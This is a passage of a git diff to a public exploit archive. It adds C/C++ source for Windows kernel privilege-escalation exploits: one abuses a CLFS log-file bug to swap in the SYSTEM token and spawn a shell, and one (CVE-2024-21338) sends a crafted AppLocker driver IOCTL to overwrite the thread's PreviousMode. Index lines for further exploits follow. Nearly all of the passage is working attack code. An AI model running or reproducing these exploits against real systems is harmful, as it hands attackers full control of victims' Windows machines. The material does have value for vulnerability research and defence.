g_ntbase = 0; +LPVOID address_to_write; + +//Final byte = kthread.previousMode = 0 +DWORD64 value_to_write = 0x0014000000000f00; + +//BOOL SwapTokens() { +// DWORD64 eprocess = 0; +// ULONG bytesRead = 0; +// DWORD64 systemtoken = 0; +// DWORD64 currenttoken = 0; +// DWORD pid = 0; +// DWORD64 privileges = 0x0000001ff2ffffbc; +// +// NtReadVirtualMemory((HANDLE)-1, (LPVOID)((DWORD64)g_ntbase + +PSACTIVEPROCESSHEAD_OFFSET), &eprocess, sizeof(eprocess), NULL); +// eprocess = eprocess - ACTIVEPROCESSLINKS_OFFSET; +// +// NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET), +&systemtoken, sizeof(systemtoken), NULL); +// +// +// while (1) { +// NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + +ACTIVEPROCESSLINKS_OFFSET), &eprocess, sizeof(eprocess), NULL); +// +// eprocess -= ACTIVEPROCESSLINKS_OFFSET; +// +// NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + +UNIQUEPROCESSID_OFFSET), &pid, sizeof(pid), NULL); +// std::cout << "pid = " << pid << std::endl; +// +// if (pid == GetCurrentProcessId()) +// break; +// } +// +// NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET), +¤ttoken, sizeof(currenttoken), NULL); +// +// +// +// //clears refcnt +// currenttoken = currenttoken & 0xfffffffffffffff0; +// +// printf("performing NtWriteVirtualMemory..\n"); +// +// getchar(); +// +// //NtWriteVirtualMemory((HANDLE)-1, (LPVOID)(currenttoken + +TOKENPRIVILEGESPRESENT_OFFSET), &privileges, 0x8, NULL); +// //NtWriteVirtualMemory((HANDLE)-1, (LPVOID)(currenttoken + +TOKENPRIVILEGSENABLED_OFFSET), &privileges, 0x8, NULL); +// +// +// NtWriteVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET), +&systemtoken, 0x8, NULL); +// +// return TRUE; +//} + +int main() +{ + HMODULE hModule; + HRSRC hResource; + errno_t err; + HGLOBAL hLoadedResource; + LPVOID pResourceData; + DWORD resourceSize; + FILE* file; + DWORD sectorsPerCluster; + DWORD bytesPerSector; + DWORD numberOfFreeClusters; + DWORD totalNumberOfClusters; + const char* rootPath = "C:\\"; + PVOID marshallingArea = NULL; + ULONGLONG pcbContainer = 0; + std::wstring logFileName = L"LOG:"; + std::wstring inputName = L"C:\\temp\\testlog\\mylogdddd.blf"; + logFileName += inputName; + DWORD64 buf = 0; + ULONG bytesRead = 0; + LPVOID PreviousModeAddr = NULL; + DWORD threadId = GetCurrentThreadId(); // Get the current thread ID + DWORD64 eprocess = 0; + DWORD64 systemtoken = 0; + DWORD64 currenttoken = 0; + DWORD64 pid = 0; + BYTE PreviousMode = 0x1; + DWORD64 privileges = 0x0000001ff2ffffbc; + const char* directoryName1 = "C:\\temp"; + const char* directoryName2 = "C:\\temp\\testlog"; + HANDLE logHndl = INVALID_HANDLE_VALUE; + ULONGLONG cbContainer = (ULONGLONG)0x80000; + + //Creating directories with the baselog and container file + if (CreateDirectoryA(directoryName1, NULL)) { + printf("Directory created successfully: %s\n", directoryName1); + } + else { + DWORD error = GetLastError(); + if (error == ERROR_ALREADY_EXISTS) { + printf("The directory already exists: %s\n", directoryName1); + } + else { + printf("Failed to create the directory. Error code: %lu\n", +error); + return 0; + } + } + + if (CreateDirectoryA(directoryName2, NULL)) { + printf("Directory created successfully: %s\n", directoryName2); + } + else { + DWORD error = GetLastError(); + if (error == ERROR_ALREADY_EXISTS) { + printf("The directory already exists: %s\n", directoryName2); + } + else { + printf("Failed to create the directory. Error code: %lu\n", +error); + return 0; + } + } + + //creating BLF + logHndl = CreateLogFile(logFileName.c_str(), + GENERIC_WRITE | GENERIC_READ, + FILE_SHARE_READ | FILE_SHARE_WRITE, + NULL, + OPEN_ALWAYS, + 0); + + if (logHndl == INVALID_HANDLE_VALUE) { + printf("CreateLogFile failed with error %d\n", GetLastError()); + return 0; + } + else { + printf("file opened successfully\n"); + } + + //creating and adding container to BLF + if (!AddLogContainer(logHndl, &cbContainer, +(LPWSTR)L"C:\\temp\\testlog\\container1", NULL)) { + printf("AddLogContainer failed with error %d\n", GetLastError()); + } + else { + printf("AddLogContainer successful\n"); + } + + //closing BLF + CloseHandle(logHndl); + + // Initialize variables + hModule = GetModuleHandle(NULL); + if (!hModule) { + printf("Failed to get module handle.\n"); + return 1; + } + + // Find the resource in the executable + hResource = FindResource(hModule, MAKEINTRESOURCE(IDR_RCDATA1), +RT_RCDATA); + if (!hResource) { + printf("Failed to find resource. Error: %lu\n", GetLastError()); + return 1; + } + + printf("hResource = 0x%p\n", hResource); + // Load the resource into memory + hLoadedResource = LoadResource(hModule, hResource); + if (!hLoadedResource) { + printf("Failed to load resource. Error: %lu\n", GetLastError()); + return 1; + } + printf("hResource = 0x%p\n", hLoadedResource); + // Lock the resource to get a pointer to its data + pResourceData = LockResource(hLoadedResource); + if (!pResourceData) { + printf("Failed to lock resource. Error: %lu\n", GetLastError()); + return 1; + } + printf("pResourceData = 0x%p\n", pResourceData); + // Get the size of the resource + resourceSize = SizeofResource(hModule, hResource); + if (resourceSize == 0) { + printf("Failed to get resource size. Error: %lu\n", GetLastError()); + return 1; + } + + // At this point, pResourceData points to the binary data, and +resourceSize contains its size + printf("Resource size: %lu bytes\n", resourceSize); + + // Example: Write the resource data to a file + err = fopen_s(&file, "C:\\temp\\testlog\\mylogdddd.blf.blf", "wb"); + if (err == 0 && file) { + fwrite(pResourceData, 1, resourceSize, file); + fclose(file); + printf("Resource written to output.bin successfully.\n"); + } + else { + printf("Failed to open output file. Error code: %d\n", err); + } + + //preparing data structures in memory + g_ntbase = GetKernelBaseAddress(); + + + NtReadVirtualMemory = +(fNtReadVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll"), +"NtReadVirtualMemory"); + NtWriteVirtualMemory = +(fNtWriteVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll"), +"NtWriteVirtualMemory"); + + if (!NtReadVirtualMemory || !NtWriteVirtualMemory) { + printf("Failed to get addresses for NtReadVirtualMemory or +NtWriteVirtualMemory\n"); + return -1; + } + + printf("NtReadVirtualMemory = 0x%p\n", (DWORD64)NtReadVirtualMemory); + printf("NtWriteVirtualMemory = 0x%p\n", (DWORD64)NtWriteVirtualMemory); + + // Open a real handle to the current thread + HANDLE threadHandle = OpenThread(THREAD_ALL_ACCESS, FALSE, threadId); + if (threadHandle == NULL) { + printf("Failed to get real handle to the current thread. Error: +%lu\n", GetLastError()); + return 1; + } + + //0x232 = offset to _KTHREAD.PreviousMode + address_to_write = (LPVOID)((DWORD64)(GetKAddrFromHandle(threadHandle)) ++ 0x232); + + auto pcclfscontainer = VirtualAlloc((LPVOID)0x2100000, 0x1000, +MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); + + memset(pcclfscontainer, 0, 0x1000); + auto vtable = (DWORD64)pcclfscontainer + 0x100; + auto rcx = pcclfscontainer; + + *(PDWORD64)((PCHAR)rcx + 0x40) = (DWORD64)pcclfscontainer + 0x200; + *(PDWORD64)((PCHAR)pcclfscontainer + 0x200 + 0x68) = (DWORD64)g_ntbase ++ DBGKPTRIAGEDUMPRESTORESTATE_OFFSET; + + //arg1 of DBGKPTRIAGEDUMPRESTORESTATE + *(PDWORD64)((PCHAR)rcx + 0x48) = (DWORD64)pcclfscontainer + 0x300; + + auto arg_DBGKPTRIAGEDUMPRESTORESTATE = (DWORD64)pcclfscontainer + 0x300; + + + //address of arbitrary write of DBGKPTRIAGEDUMPRESTORESTATE. remember +It writes at offset 0x2078 of where + *((PDWORD64)(arg_DBGKPTRIAGEDUMPRESTORESTATE)) = +(DWORD64)address_to_write - 0x2078; + + //value of arbitrary write of DBGKPTRIAGEDUMPRESTORESTATE + *((PDWORD64)((PCHAR)arg_DBGKPTRIAGEDUMPRESTORESTATE + 0x10)) = +0x0014000000000f00; + + ((PDWORD64)vtable)[1] = (DWORD64)g_ntbase + +POFXPROCESSORNOTIFICATION_OFFSET; + *(PDWORD64)pcclfscontainer = (DWORD64)vtable; + + printf("pcclfscontainer = 0x%p\n", (DWORD64)pcclfscontainer); + + printf("address_to_write = 0x%p\n", (DWORD64)address_to_write); + + HANDLE processHandle = GetCurrentProcess(); // Get the current process +handle + + + + + + // Set the process priority to HIGH_PRIORITY_CLASS + if (SetPriorityClass(processHandle, REALTIME_PRIORITY_CLASS)) { + printf("Process priority set to REALTIME_PRIORITY_CLASS.\n"); + } + else { + DWORD error = GetLastError(); + printf("Failed to set process priority. Error code: %lu\n", error); + return 1; + } + threadHandle = GetCurrentThread(); + if (SetThreadPriority(threadHandle, THREAD_PRIORITY_TIME_CRITICAL)) { + printf("Thread priority set to the highest level: +TIME_CRITICAL.\n"); + } + else { + DWORD error = GetLastError(); + printf("Failed to set thread priority. Error code: %lu\n", error); + return 1; + } + + printf("triggering vuln..."); + logHndl = CreateLogFile(logFileName.c_str(), + GENERIC_WRITE | GENERIC_READ, + FILE_SHARE_READ | FILE_SHARE_WRITE, + NULL, + OPEN_ALWAYS, + 0); + + if (logHndl == INVALID_HANDLE_VALUE) { + printf("CreateLogFile failed with error %d\n", GetLastError()); + } + else { + printf("file opened successfully\n"); + } + + // Set the process priority to HIGH_PRIORITY_CLASS + if (SetPriorityClass(processHandle, NORMAL_PRIORITY_CLASS)) { + printf("Process priority set to NORMAL_PRIORITY_CLASS.\n"); + } + else { + DWORD error = GetLastError(); + printf("Failed to set process priority. Error code: %lu\n", error); + return 1; + } + if (SetThreadPriority(threadHandle, THREAD_PRIORITY_NORMAL)) { + printf("Thread priority set to the highest level: +THREAD_PRIORITY_NORMAL.\n"); + } + else { + DWORD error = GetLastError(); + printf("Failed to set thread priority. Error code: %lu\n", error); + return 1; + } + + printf("vuln triggered\n"); + + printf("reading base of ntoskrnl to check we have arbitrary +read/write\n"); + + NtReadVirtualMemory((HANDLE)-1, g_ntbase, &buf, sizeof(buf), NULL); + + printf("buf = 0x%p\n", (DWORD64)buf); + + printf("swapping tokens...\n"); + + NtReadVirtualMemory((HANDLE)-1, (LPVOID)((DWORD64)g_ntbase + +PSACTIVEPROCESSHEAD_OFFSET), &eprocess, sizeof(eprocess), NULL); + eprocess = eprocess - ACTIVEPROCESSLINKS_OFFSET; + + NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET), +&systemtoken, sizeof(systemtoken), NULL); + + + while (1) { + NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + +ACTIVEPROCESSLINKS_OFFSET), &eprocess, sizeof(eprocess), NULL); + + eprocess -= ACTIVEPROCESSLINKS_OFFSET; + + NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + +UNIQUEPROCESSID_OFFSET), &pid, sizeof(pid), NULL); + + if (pid == (DWORD64)GetCurrentProcessId()) + break; + } + + printf("current token address = 0x%p\n", eprocess + TOKEN_OFFSET); + printf("systemtoken = 0x%p\n", systemtoken); + + printf("Overwriting process token..\n"); + + NtWriteVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET), +&systemtoken, sizeof(systemtoken), NULL); + + printf("token swapped. Restoring PreviousMode and spawning system +shell...\n"); + + PreviousModeAddr = address_to_write; + PreviousMode = 0x1; + NtWriteVirtualMemory((HANDLE)-1, PreviousModeAddr, &PreviousMode, +sizeof(PreviousMode), NULL); + + system("cmd.exe"); + + return 0; +} \ No newline at end of file diff --git a/exploits/windows/local/52275.c b/exploits/windows/local/52275.c new file mode 100644 index 000000000..f7759f393 --- /dev/null +++ b/exploits/windows/local/52275.c @@ -0,0 +1,393 @@ +# Exploit Title: Microsoft Windows 11 - Kernel Privilege Escalation +# Date: 2025-04-16 +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Contact: miladgrayhat@gmail.com +# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL +# Tested on: Win, Ubuntu +# CVE : CVE-2024-21338 + + + +#include "pch.hpp" +#include "poc.hpp" + +// This function is used to set the IOCTL buffer depending on the Windows +version +void* c_poc::set_ioctl_buffer(size_t* k_thread_offset, OSVERSIONINFOEXW* +os_info) +{ + os_info->dwOSVersionInfoSize = sizeof(*os_info); + // Get the OS version + NTSTATUS status = RtlGetVersion(os_info); + if (!NT_SUCCESS(status)) { + log_err("Failed to get OS version!"); + return nullptr; + } + + log_debug("Windows version detected: %lu.%lu, build: %lu.", +os_info->dwMajorVersion, os_info->dwMinorVersion, os_info->dwBuildNumber); + + // "PreviousMode" offset in ETHREAD structure + *k_thread_offset = 0x232; + // Set the "AipSmartHashImageFile" function buffer depending on the +Windows version + void* ioctl_buffer_alloc = os_info->dwBuildNumber < 22000 + ? malloc(sizeof(AIP_SMART_HASH_IMAGE_FILE_W10)) + : malloc(sizeof(AIP_SMART_HASH_IMAGE_FILE_W11)); + + return ioctl_buffer_alloc; +} + +// This function is used to get the ETHREAD address through the +SystemHandleInformation method that is used to get the address of the +current thread object based on the pseudo handle -2 +UINT_PTR c_poc::get_ethread_address() +{ + // Duplicate the pseudo handle -2 to get the current thread object + HANDLE h_current_thread_pseudo = reinterpret_cast(-2); + HANDLE h_duplicated_handle = {}; + + if (!DuplicateHandle( + reinterpret_cast(-1), + h_current_thread_pseudo, + reinterpret_cast(-1), + &h_duplicated_handle, + NULL, + FALSE, + DUPLICATE_SAME_ACCESS)) + { + log_err("Failed to duplicate handle, error: %lu", GetLastError()); + return EXIT_FAILURE; + } + + NTSTATUS status = {}; + ULONG ul_bytes = {}; + PSYSTEM_HANDLE_INFORMATION h_table_info = {}; + // Get the current thread object address + while ((status = NtQuerySystemInformation(SystemHandleInformation, +h_table_info, ul_bytes, &ul_bytes)) == STATUS_INFO_LENGTH_MISMATCH) + { + if (h_table_info != NULL) + h_table_info = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), +HEAP_ZERO_MEMORY, h_table_info, (2 * (SIZE_T)ul_bytes)); + else + h_table_info = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), +HEAP_ZERO_MEMORY, (2 * (SIZE_T)ul_bytes)); + } + + UINT_PTR ptr_token_address = 0; + if (NT_SUCCESS(status)) { + for (ULONG i = 0; i < h_table_info->NumberOfHandles; i++) { + if (h_table_info->Handles[i].UniqueProcessId == GetCurrentProcessId() && + h_table_info->Handles[i].HandleValue == + reinterpret_cast(h_duplicated_handle)) { + ptr_token_address = + reinterpret_cast(h_table_info->Handles[i].Object); + break; + } + } + } + else { + if (h_table_info) { + log_err("NtQuerySystemInformation failed, (code: 0x%X)", status); + NtClose(h_duplicated_handle); + } + } + + return ptr_token_address; +} + +// This function is used to get the FileObject address through the +SystemHandleInformation method that is used to get the address of the file +object. +UINT_PTR c_poc::get_file_object_address() +{ + // Create a dummy file to get the file object address + HANDLE h_file = CreateFileW(L"C:\\Users\\Public\\example.txt", + GENERIC_READ | GENERIC_WRITE, + FILE_SHARE_READ | FILE_SHARE_WRITE, nullptr, + CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, nullptr); + if (h_file == INVALID_HANDLE_VALUE) { + log_err("Failed to open dummy file, error: %lu", GetLastError()); + return EXIT_FAILURE; + } + + // Get the file object address + NTSTATUS status = {}; + ULONG ul_bytes = 0; + PSYSTEM_HANDLE_INFORMATION h_table_info = NULL; + while ((status = NtQuerySystemInformation( + SystemHandleInformation, h_table_info, ul_bytes, + &ul_bytes)) == STATUS_INFO_LENGTH_MISMATCH) { + if (h_table_info != NULL) + h_table_info = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), +HEAP_ZERO_MEMORY, h_table_info, 2 * (SIZE_T)ul_bytes); + else + h_table_info = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), +HEAP_ZERO_MEMORY, 2 * (SIZE_T)ul_bytes); + + } + + UINT_PTR token_address = 0; + if (NT_SUCCESS(status)) { + for (ULONG i = 0; i < h_table_info->NumberOfHandles; i++) { + if (h_table_info->Handles[i].UniqueProcessId == GetCurrentProcessId() && + h_table_info->Handles[i].HandleValue == + reinterpret_cast(h_file)) { + token_address = + reinterpret_cast(h_table_info->Handles[i].Object); + break; + } + } + } + + return token_address; +} + +// This function is used to get the kernel module address based on the +module name +UINT_PTR c_poc::get_kernel_module_address(const char* target_module) +{ + // Get the kernel module address based on the module name + NTSTATUS status = {}; + ULONG ul_bytes = {}; + PSYSTEM_MODULE_INFORMATION h_table_info = {}; + while ((status = NtQuerySystemInformation( + SystemModuleInformation, h_table_info, ul_bytes, + &ul_bytes)) == STATUS_INFO_LENGTH_MISMATCH) { + if (h_table_info != NULL) + h_table_info = (PSYSTEM_MODULE_INFORMATION)HeapReAlloc(GetProcessHeap(), +HEAP_ZERO_MEMORY, h_table_info, 2 * (SIZE_T)ul_bytes); + else + h_table_info = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), +HEAP_ZERO_MEMORY, 2 * (SIZE_T)ul_bytes); + } + + if (NT_SUCCESS(status)) { + for (ULONG i = 0; i < h_table_info->ModulesCount; i++) { + if (strstr(h_table_info->Modules[i].Name, target_module) != nullptr) { + return reinterpret_cast( + h_table_info->Modules[i].ImageBaseAddress); + } + } + } + + return 0; +} + +// This function is used to scan the section for the pattern. +BOOL c_poc::scan_section_for_pattern(HANDLE h_process, LPVOID +lp_base_address, SIZE_T dw_size, BYTE* pattern, SIZE_T pattern_size, +LPVOID* lp_found_address) { + std::unique_ptr buffer(new BYTE[dw_size]); + SIZE_T bytes_read = {}; + if (!ReadProcessMemory(h_process, lp_base_address, buffer.get(), dw_size, + &bytes_read)) { + return false; + } + + for (SIZE_T i = 0; i < dw_size - pattern_size; i++) { + if (memcmp(pattern, &buffer[i], pattern_size) == 0) { + *lp_found_address = reinterpret_cast( + reinterpret_cast(lp_base_address) + i); + return true; + } + } + + return false; +} + +// This function is used to find the pattern in the module, in this case +the pattern is the nt!ExpProfileDelete function +UINT_PTR c_poc::find_pattern(HMODULE h_module) +{ + UINT_PTR relative_offset = {}; + + auto* p_dos_header = reinterpret_cast(h_module); + auto* p_nt_headers = reinterpret_cast( + reinterpret_cast(h_module) + p_dos_header->e_lfanew); + auto* p_section_header = IMAGE_FIRST_SECTION(p_nt_headers); + + LPVOID lp_found_address = nullptr; + + for (WORD i = 0; i < p_nt_headers->FileHeader.NumberOfSections; i++) { + if (strcmp(reinterpret_cast(p_section_header[i].Name), "PAGE") == + 0) { + LPVOID lp_section_base_address = + reinterpret_cast(reinterpret_cast(h_module) + + p_section_header[i].VirtualAddress); + SIZE_T dw_section_size = p_section_header[i].Misc.VirtualSize; + + // Pattern to nt!ExpProfileDelete + BYTE pattern[] = { 0x40, 0x53, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x83, + 0x79, 0x30, 0x00, 0x48, 0x8B, 0xD9, 0x74 }; + SIZE_T pattern_size = sizeof(pattern); + + if (this->scan_section_for_pattern( + GetCurrentProcess(), lp_section_base_address, dw_section_size, + pattern, pattern_size, &lp_found_address)) { + relative_offset = reinterpret_cast(lp_found_address) - + reinterpret_cast(h_module); + } + + break; + } + } + + return relative_offset; +} + +// This function is used to send the IOCTL request to the driver, in this +case the AppLocker driver through the AipSmartHashImageFile IOCTL +bool c_poc::send_ioctl_request(HANDLE h_device, PVOID input_buffer, size_t +input_buffer_length) +{ + IO_STATUS_BLOCK io_status = {}; + NTSTATUS status = + NtDeviceIoControlFile(h_device, nullptr, nullptr, nullptr, &io_status, + this->IOCTL_AipSmartHashImageFile, input_buffer, + input_buffer_length, nullptr, 0); + return NT_SUCCESS(status); +} + +// This function executes the exploit +bool c_poc::act() { + // Get the OS version, set the IOCTL buffer and open a handle to the +AppLocker driver + OSVERSIONINFOEXW os_info = {}; + size_t offset_of_previous_mode = {}; + auto ioctl_buffer = this->set_ioctl_buffer(&offset_of_previous_mode, +&os_info); + + if (!ioctl_buffer) { + log_err("Failed to allocate the correct buffer to send on the IOCTL +request."); + return false; + } + + // Open a handle to the AppLocker driver + OBJECT_ATTRIBUTES object_attributes = {}; + UNICODE_STRING appid_device_name = {}; + RtlInitUnicodeString(&appid_device_name, L"\\Device\\AppID"); + InitializeObjectAttributes(&object_attributes, &appid_device_name, +OBJ_CASE_INSENSITIVE, NULL, NULL, NULL); + + IO_STATUS_BLOCK io_status = {}; + HANDLE h_device = {}; + NTSTATUS status = NtCreateFile(&h_device, GENERIC_READ | GENERIC_WRITE, + &object_attributes, &io_status, NULL, FILE_ATTRIBUTE_NORMAL, + FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN, 0, NULL, 0); + + if (!NT_SUCCESS(status)) + { + log_debug("Failed to open a handle to the AppLocker driver (%ls) (code: +0x%X)", appid_device_name.Buffer, status); + return false; + } + + log_debug("AppLocker (AppId) handle opened: 0x%p", h_device); + + log_debug("Leaking the current ETHREAD address."); + + // Get the ETHREAD address, FileObject address, KernelBase address and the +relative offset of the nt!ExpProfileDelete function + auto e_thread_address = this->get_ethread_address(); + auto file_obj_address = this->get_file_object_address(); + + auto ntoskrnl_kernel_base_address = +this->get_kernel_module_address("ntoskrnl.exe"); + auto ntoskrnl_user_base_address = +LoadLibraryExW(L"C:\\Windows\\System32\\ntoskrnl.exe", NULL, NULL); + + if (!e_thread_address && !ntoskrnl_kernel_base_address && +!ntoskrnl_user_base_address && !file_obj_address) + { + log_debug("Failed to fetch the ETHREAD/FileObject/KernelBase addresses."); + return false; + } + + log_debug("ETHREAD address leaked: 0x%p", e_thread_address); + log_debug("Feching the ExpProfileDelete (user cfg gadget) address."); + auto relative_offset = this->find_pattern(ntoskrnl_user_base_address); + UINT_PTR kcfg_gadget_address = (ntoskrnl_kernel_base_address + +relative_offset); + + ULONG_PTR previous_mode = (e_thread_address + offset_of_previous_mode); + log_debug("Current ETHREAD PreviousMode address -> 0x%p", previous_mode); + log_debug("File object address -> 0x%p", file_obj_address); + + log_debug("kCFG Kernel Base address -> 0x%p", +ntoskrnl_kernel_base_address); + log_debug("kCFG User Base address -> 0x%p", ntoskrnl_user_base_address); + log_debug("kCFG Gadget address -> 0x%p", kcfg_gadget_address); + + // Set the IOCTL buffer depending on the Windows version + size_t ioctl_buffer_length = {}; + CFG_FUNCTION_WRAPPER kcfg_function = {}; + if (os_info.dwBuildNumber < 22000) { + AIP_SMART_HASH_IMAGE_FILE_W10* w10_ioctl_buffer = +(AIP_SMART_HASH_IMAGE_FILE_W10*)ioctl_buffer; + + kcfg_function.FunctionPointer = (PVOID)kcfg_gadget_address; + // Add 0x30 because of lock xadd qword ptr [rsi-30h], rbx in +ObfDereferenceObjectWithTag + UINT_PTR previous_mode_obf = previous_mode + 0x30; + + w10_ioctl_buffer->FirstArg = previous_mode_obf; // +0x00 + w10_ioctl_buffer->Value = (PVOID)file_obj_address; // +0x08 + w10_ioctl_buffer->PtrToFunctionWrapper = &kcfg_function; // +0x10 + + ioctl_buffer_length = sizeof(AIP_SMART_HASH_IMAGE_FILE_W10); + } + else + { + AIP_SMART_HASH_IMAGE_FILE_W11* w11_ioctl_buffer = +(AIP_SMART_HASH_IMAGE_FILE_W11*)ioctl_buffer; + + kcfg_function.FunctionPointer = (PVOID)kcfg_gadget_address; + // Add 0x30 because of lock xadd qword ptr [rsi-30h], rbx in +ObfDereferenceObjectWithTag + UINT_PTR previous_mode_obf = previous_mode + 0x30; + + w11_ioctl_buffer->FirstArg = previous_mode_obf; // +0x00 + w11_ioctl_buffer->Value = (PVOID)file_obj_address; // +0x08 + w11_ioctl_buffer->PtrToFunctionWrapper = &kcfg_function; // +0x10 + w11_ioctl_buffer->Unknown = NULL; // +0x18 + + ioctl_buffer_length = sizeof(AIP_SMART_HASH_IMAGE_FILE_W11); + } + + // Send the IOCTL request to the driver + log_debug("Sending IOCTL request to 0x22A018 (AipSmartHashImageFile)"); + char* buffer = (char*)malloc(sizeof(CHAR)); + if (ioctl_buffer) + { + log_debug("ioctl_buffer -> 0x%p size: %d", ioctl_buffer, +ioctl_buffer_length); + + if (!this->send_ioctl_request(h_device, ioctl_buffer, +ioctl_buffer_length)) + return false; + + NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)buffer, +(PVOID)previous_mode, sizeof(CHAR), nullptr); + log_debug("Current PreviousMode -> %d", *buffer); + + // From now on all Read/Write operations will be done in Kernel Mode. + } + + log_debug("Restoring..."); + // Restores PreviousMode to 1 (user-mode). + *buffer = 1; + NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)previous_mode, +(PVOID)buffer, sizeof(CHAR), nullptr); + log_debug("Current PreviousMode -> %d", *buffer); + + // Free the allocated memory and close the handle to the AppLocker driver + free(ioctl_buffer); + free(buffer); + NtClose(h_device); + + + return true; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index eb116ea7a..55f26364c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -7829,6 +7829,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,,2019-04-19,2019-04-19,1,CVE-2010-4170,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb 46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,,2019-04-19,2019-04-19,1,CVE-2010-4170,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb 23892,exploits/linux/local/23892.c,"Systrace 1.x - Local Policy Bypass",2004-03-29,Brad,local,linux,,2004-03-29,2013-01-05,1,,,,,,https://www.securityfocus.com/bid/9998/info +52268,exploits/linux/local/52268.py,"tar-fs 3.0.0 - Arbitrary File Write/Overwrite",2025-04-22,cybersploit,local,linux,,2025-04-22,2025-04-22,0,CVE-2024-12905,,,,, 23350,exploits/linux/local/23350.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (1)",2003-11-07,c0wboy,local,linux,,2003-11-07,2012-12-13,1,,,,,,http://www.0x333.org/advisories/outsiders-terminatorX-001.txt 23351,exploits/linux/local/23351.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (2)",2003-11-07,Bobby,local,linux,,2003-11-07,2012-12-13,1,,,,,,https://www.securityfocus.com/bid/8993/info 23352,exploits/linux/local/23352.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (3)",2003-11-07,"m00 security",local,linux,,2003-11-07,2012-12-13,1,,,,,,https://www.securityfocus.com/bid/8993/info @@ -8564,6 +8565,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,,2018-07-10,2018-07-10,0,,,,,,https://github.com/SECFORCE/sftp-exploit/blob/9ffed4de6da26a6ee70e105235d7a5c596269a43/sftp-exploit.py 40963,exploits/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",remote,linux,22,2016-12-23,2016-12-23,1,CVE-2016-10009,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1009 45939,exploits/linux/remote/45939.py,"OpenSSH < 7.7 - User Enumeration (2)",2018-12-04,"Leap Security",remote,linux,22,2018-12-04,2018-12-04,0,CVE-2018-15473,,,,, +52269,exploits/linux/remote/52269.c,"OpenSSH server (sshd) 9.8p1 - Race Condition",2025-04-22,"Milad karimi",remote,linux,,2025-04-22,2025-04-22,0,CVE-2024-6387,,,,, 26,exploits/linux/remote/26.sh,"OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident",2003-05-02,"Nicolas Couture",remote,linux,,2003-05-01,2016-10-27,1,OSVDB-2140;CVE-2003-0190,,,,http://www.exploit-db.comopenssh-3.6.1p1.tar.gz, 25,exploits/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",remote,linux,,2003-04-29,2016-02-10,1,OSVDB-2140;CVE-2003-0190,,,,http://www.exploit-db.comopenssh-3.6.1p1.tar.gz,http://lab.mediaservice.net/advisory/2003-01-openssh.txt 40113,exploits/linux/remote/40113.txt,"OpenSSHd 7.2p2 - Username Enumeration",2016-07-18,"Eddie Harari",remote,linux,22,2016-07-18,2016-12-07,0,CVE-2016-6210,,,,http://www.exploit-db.comopenssh-7.2p2.tar.gz,http://seclists.org/fulldisclosure/2016/Jul/51 @@ -10914,6 +10916,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 30944,exploits/multiple/remote/30944.txt,"Feng 0.1.15 - Multiple Remote Buffer Overflow / Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",remote,multiple,,2007-12-27,2014-01-20,1,CVE-2007-6630;OSVDB-40158,,,,,https://www.securityfocus.com/bid/27049/info 31050,exploits/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",remote,multiple,,2008-01-28,2014-01-20,1,CVE-2008-0387;OSVDB-43187,,,,,https://www.securityfocus.com/bid/27403/info 29820,exploits/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor 